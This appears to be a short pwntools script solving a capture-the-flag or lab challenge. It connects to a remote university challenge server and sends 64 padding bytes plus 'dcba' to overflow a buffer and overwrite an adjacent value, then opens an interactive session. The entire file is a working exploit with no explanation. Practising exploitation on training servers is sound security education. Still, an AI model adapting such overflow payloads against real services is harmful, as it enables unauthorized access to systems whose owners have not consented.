11 lines
179 B
Python
11 lines
179 B
Python
from pwn import *
|
|
|
|
HOST = "mustard.stt.rnl.tecnico.ulisboa.pt"
|
|
PORT = 25152
|
|
|
|
conn = remote(HOST, PORT)
|
|
|
|
conn.recvuntil("?\n")
|
|
conn.send(b"\x55"*64 + b"dcba\n")
|
|
conn.interactive()
|